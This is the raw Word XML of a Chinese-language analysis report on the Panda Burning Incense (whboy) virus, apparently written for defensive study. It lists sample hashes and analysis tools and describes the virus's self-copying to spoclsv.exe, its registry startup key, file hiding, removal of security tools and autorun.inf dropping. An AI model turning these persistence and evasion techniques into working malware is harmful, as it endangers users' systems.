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E48F" w14:textId="4BBDED7E" w:rsidR="008037B4" w:rsidRPr="00623B6E" w:rsidRDefault="008037B4" w:rsidP="00623B6E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="84"/>
          <w:szCs w:val="84"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk3126859"/>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:color w:val="auto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7062F" w14:textId="77777777" w:rsidR="000C7E80" w:rsidRPr="00D01F4F" w:rsidRDefault="000C7E80" w:rsidP="000C7E80">
          <w:pPr>
            <w:pStyle w:val="TOC"/>
            <w:rPr>
              <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
              <w:b/>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00D01F4F">
            <w:rPr>
              <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
              <w:b/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>目录</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2A760962" w14:textId="29EB93A1" w:rsidR="00623B6E" w:rsidRDefault="000C7E8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932" w:history="1">
            <w:r w:rsidR="00623B6E" w:rsidRPr="00093860">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1．</w:t>
            </w:r>
            <w:r w:rsidR="00623B6E" w:rsidRPr="00093860">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="宋体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>样本概况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2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0D52C634" w14:textId="7A89347C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3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1.1 样本信息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3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3B8A64F3" w14:textId="1CA203F5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4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1.2 测试环境及工具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4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474F90A0" w14:textId="020FF484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5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1.3 分析目标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5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526C1581" w14:textId="06577284" w:rsidR="00623B6E" w:rsidRDefault="0014490C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6" w:history="1">
            <w:r w:rsidR="00623B6E" w:rsidRPr="00093860">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2．具体行为分析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6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1781C55D" w14:textId="7DC4EBA7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7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 xml:space="preserve">2.1 </w:t>
            </w:r>
            <w:r w:rsidR="00623B6E" w:rsidRPr="00093860">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>主要行为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7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687D4FE8" w14:textId="54A78A71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8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 xml:space="preserve">2.1.1 </w:t>
            </w:r>
            <w:r w:rsidR="00623B6E" w:rsidRPr="00093860">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>恶意程序对用户造成的危害(图)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8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5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2A6F704B" w14:textId="45FC7965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39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2.2 恶意代码分析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39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7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1033AE23" w14:textId="14B5E49D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0" w:history="1">
            <w:r w:rsidR="00623B6E" w:rsidRPr="00093860">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1 加固后的恶意代码树结构图(是否有加固)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0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7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29AC33BB" w14:textId="0A6D7EBD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1" w:history="1">
            <w:r w:rsidR="00623B6E" w:rsidRPr="00093860">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 恶意程序的代码分析片段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1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8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4E495D8E" w14:textId="69B6EF1D" w:rsidR="00623B6E" w:rsidRDefault="0014490C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2" w:history="1">
            <w:r w:rsidR="00623B6E" w:rsidRPr="00093860">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3．解决方案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2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5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6F96FB82" w14:textId="7CCB6B3D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3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3.1 提取病毒的特征，利用杀毒软件查杀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3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5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0E3B8BC9" w14:textId="0151D051" w:rsidR="00623B6E" w:rsidRDefault="0014490C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4" w:history="1">
            <w:r w:rsidR="00623B6E" w:rsidRPr="00093860">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2 手工查杀步骤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4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5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1D6E64AE" w14:textId="6DE7622F" w:rsidR="00623B6E" w:rsidRDefault="0014490C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126945" w:history="1">
            <w:r w:rsidR="00623B6E" w:rsidRPr="00093860">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
                <w:noProof/>
              </w:rPr>
              <w:t>致     谢</w:t>
            </w:r>
            <w:r w:rsidR="00623B6E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00623B6E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00623B6E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3126945 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00623B6E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00623B6E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00623B6E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="00623B6E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FC5595A" w14:textId="143E5CFF" w:rsidR="000C7E80" w:rsidRDefault="000C7E80" w:rsidP="000C7E8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1018D7C" w14:textId="77777777" w:rsidR="000C7E80" w:rsidRPr="00DD1F46" w:rsidRDefault="0014490C" w:rsidP="00DD1F46"/>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="639DCC4D" w14:textId="77777777" w:rsidR="006556E1" w:rsidRDefault="00CF5597" w:rsidP="00276F1B">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc3126932"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="006556E1">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>．</w:t>
      </w:r>
      <w:r w:rsidR="006556E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样本</w:t>
      </w:r>
      <w:r w:rsidR="006556E1" w:rsidRPr="00276F1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概况</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="37B3825C" w14:textId="77777777" w:rsidR="006556E1" w:rsidRPr="00CF5597" w:rsidRDefault="006556E1" w:rsidP="00276F1B">
      <w:pPr>
        <w:pStyle w:val="2"/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" w:name="_Toc3126933"/>
      <w:r w:rsidRPr="00CF5597">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5597">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 样本信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="7C9CDBD5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病毒名称：</w:t>
      </w:r>
      <w:r w:rsidR="00107A00">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>熊猫烧香</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AA8778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所属家族：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00107A00">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00107A00">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hboy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="311BE1A2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MD5值：</w:t>
      </w:r>
      <w:r w:rsidR="00107A00" w:rsidRPr="00107A00">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>512301C535C88255C9A252FDF70B7A03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ABD1EE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SHA1值：</w:t>
      </w:r>
      <w:r w:rsidR="00107A00" w:rsidRPr="00107A00">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CA3A1070CFF311C0BA40AB60A8FE3266CFEFE870</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA15546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CRC32：</w:t>
      </w:r>
      <w:r w:rsidR="00107A00" w:rsidRPr="00107A00">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>E334747C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77515902" w14:textId="77777777" w:rsidR="006556E1" w:rsidRPr="000757E9" w:rsidRDefault="006556E1" w:rsidP="00DF39A9">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000757E9">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>病毒行为：</w:t>
      </w:r>
      <w:r w:rsidR="00107A00" w:rsidRPr="00107A00">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>自我复制</w:t>
      </w:r>
      <w:r w:rsidR="00107A00" w:rsidRPr="00107A00">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,感染可执行文件,修改网页文件内容,修改注册表,删除备份文件,关闭杀毒软件窗口,服务与进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D0A83A" w14:textId="77777777" w:rsidR="00E66FD6" w:rsidRDefault="006556E1" w:rsidP="00E66FD6">
      <w:pPr>
        <w:pStyle w:val="2"/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3" w:name="_Toc3126934"/>
      <w:r w:rsidRPr="009A2DBF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.2</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2DBF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 测试环境及工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="0DD26E59" w14:textId="77777777" w:rsidR="00107A00" w:rsidRPr="00107A00" w:rsidRDefault="00107A00" w:rsidP="00107A00">
      <w:r w:rsidRPr="00107A00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试环境</w:t>
      </w:r>
      <w:r w:rsidRPr="00107A00">
        <w:t>:win7 32bit  分析工具:OD,IDA,火绒剑,</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00107A00">
        <w:t>PChunter</w:t>
      </w:r>
      <w:r w:rsidR="00412F20">
        <w:t>,ProcessMonitor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5CE0056D" w14:textId="77777777" w:rsidR="00850B9E" w:rsidRDefault="000334F0" w:rsidP="00DD1F46">
      <w:pPr>
        <w:pStyle w:val="2"/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4" w:name="_Toc3126935"/>
      <w:r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CF5597"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分析目标</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="193D102D" w14:textId="77777777" w:rsidR="00107A00" w:rsidRPr="00107A00" w:rsidRDefault="00107A00" w:rsidP="00107A00">
      <w:r w:rsidRPr="00107A00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析病毒行为与程序具体执行流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A23F33" w14:textId="77777777" w:rsidR="002F77BE" w:rsidRPr="00850B9E" w:rsidRDefault="00850B9E" w:rsidP="00850B9E">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc470467091"/>
      <w:bookmarkStart w:id="6" w:name="_Toc3126936"/>
      <w:r w:rsidRPr="00850B9E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="00850B9E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>．具体行为分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="295F71DA" w14:textId="77777777" w:rsidR="00CF5597" w:rsidRPr="009A2DBF" w:rsidRDefault="00CF5597" w:rsidP="009A2DBF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7" w:name="_Toc3126937"/>
      <w:r w:rsidRPr="009A2DBF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Pr="009A2DB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2DBF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主要行为</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="4D9F885E" w14:textId="77777777" w:rsidR="00AE7A21" w:rsidRDefault="00BC61D5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t>1. 对熊猫烧香进程树</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的监控分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3F659F" w14:textId="77777777" w:rsidR="00BC61D5" w:rsidRDefault="00BC61D5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1A00EE" wp14:editId="27A29D1A">
            <wp:extent cx="5278120" cy="1744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F0C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</w:p>
    <w:p w14:paraId="2458B39F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</w:p>
    <w:p w14:paraId="79EFA071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71C4D7" wp14:editId="3B993024">
            <wp:extent cx="5278120" cy="1227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0C67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8373E">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在进程树中可以发现，“熊猫烧香</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8373E">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.exe”衍生出了“spoclsv.exe”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 并且几秒之后父进程不见了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>由此可以推断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>病毒复制了一个副本到系统目录下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>并且结束了本进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C47C746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8373E">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>病毒行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8373E">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1：病毒本身创建了名为“spoclsv.exe”的进程，该进程文件的路径为“C:\WINDOWS\system32\drivers\spoclsv.exe”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B4AC03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8373E">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>病毒行为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2：自我删除</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6637B200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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>po0lsv.exe注册表的监控</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B48BB6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8AC37" wp14:editId="5953C3B3">
            <wp:extent cx="5278120" cy="256413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34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t>病毒行为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：设为开机启动项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D303A34" w14:textId="77777777" w:rsidR="00D8373E" w:rsidRDefault="00D8373E" w:rsidP="00C11F66">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体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877E78" wp14:editId="520BB6A2">
            <wp:extent cx="5278120" cy="24561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C314" w14:textId="77777777" w:rsidR="00D8373E" w:rsidRDefault="00D8373E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t>病毒行为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：修改注册表值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>让隐藏文件不可见</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F89E441" w14:textId="77777777" w:rsidR="00ED0DFC" w:rsidRDefault="00ED0DFC" w:rsidP="00ED0DFC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</w:p>
    <w:p w14:paraId="1806738C" w14:textId="77777777" w:rsidR="00ED0DFC" w:rsidRPr="00ED0DFC" w:rsidRDefault="00ED0DFC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</w:p>
    <w:p w14:paraId="4A8B84EB" w14:textId="77777777" w:rsidR="00D8373E" w:rsidRDefault="00ED0DFC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6A3434" wp14:editId="53617014">
            <wp:extent cx="5278120" cy="258381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1B03" w14:textId="77777777" w:rsidR="00ED0DFC" w:rsidRDefault="00ED0DFC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lastRenderedPageBreak/>
        <w:t>病毒行为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：删除安全类工具的启动项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255434A8" w14:textId="77777777" w:rsidR="00ED0DFC" w:rsidRDefault="00ED0DFC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t>3 对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>po0lsv.exe文件的监控</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74E075" w14:textId="77777777" w:rsidR="00ED0DFC" w:rsidRDefault="00ED0DFC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158A27" wp14:editId="4161E0AC">
            <wp:extent cx="5278120" cy="308229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B0A8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F4EC8A" wp14:editId="692363F7">
            <wp:extent cx="5278120" cy="24028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A2A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EE1E9" wp14:editId="6EED5FB0">
            <wp:extent cx="5278120" cy="30975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DC5" w14:textId="77777777" w:rsidR="00D8373E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512E7">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在图中可以看到，病毒文件在“</w:t>
      </w:r>
      <w:r w:rsidRPr="00D512E7">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C:\WINDOWS\system32\drivers”中创建了“spoclsv.exe”这个文件，在C盘根目录下创建了“setup.exe”与“autorun.inf”，并且在一些目录中创建了“Desktop_.ini”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>而且访问了一个.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D512E7">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>些</w:t>
      </w:r>
      <w:r w:rsidRPr="00D512E7">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
